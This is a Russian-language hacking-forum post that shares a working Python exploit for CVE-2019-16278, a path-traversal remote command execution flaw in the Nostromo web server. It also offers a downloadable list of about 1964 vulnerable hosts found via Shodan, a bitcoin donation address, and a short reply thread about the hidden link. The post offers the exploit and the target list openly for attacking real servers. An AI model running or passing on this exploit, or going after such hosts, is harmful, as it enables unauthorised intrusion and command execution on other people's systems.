• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Shodan : Nostromo = RCE

netcat

(L3) cache
Забанен
Регистрация
26.07.2019
Сообщения
158
Реакции
448
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет, забыл что 21 числа вышла еще одна интересная RCE под Nostromo web server. CVE-2019-16278
Посмотрим сколько данных выдает шодан?


1577304170582.png


Ниже рабочий и простой PoC под CVE-2019-16278
Python:
#!/usr/bin/env python

import socket
import argparse

parser = argparse.ArgumentParser(description='RCE in Nostromo web server through 1.9.6 due to path traversal.')
parser.add_argument('host',help='domain/IP of the Nostromo web server')
parser.add_argument('port',help='port number',type=int)
parser.add_argument('cmd',help='command to execute, default is id',default='id',nargs='?')
args = parser.parse_args()

def recv(s):
    r=''
    try:
        while True:
            t=s.recv(1024)
            if len(t)==0:
                break
            r+=t
    except:
        pass
    return r
def exploit(host,port,cmd):
    s=socket.socket()
    s.settimeout(1)
    s.connect((host,int(port)))
    payload="""POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)
    s.send(payload)
    r=recv(s)
    r=r[r.index('\r\n\r\n')+4:]
    print r

exploit(args.host,args.port,args.cmd)


IT WORKS :)

1577304245528.png



II. Бонус ?

1964 - IP:port с Shodan

[CLIKE]Скачать кликабельно[/CLIKE]
1577304479235.png


Всем удачного хака

btc donate : 1M3pxdWZnei2QRGishZvp3DoCRm3d9mR5M
 
Последнее редактирование:
Интересные вещи на форуме, не ставил тебе Like, просто нажал на скрытый текст и мне открылась ссылка: https://www.sendspace.com/file/czq2qx
ТС ты потерял кнопку Скрыть Контент или просто шутка была?
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
да. хайды теперь буду ставить по количеству реакций у пользователя. от 20+

Если интересно то чаще заглядывайте в разделы форума ;)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх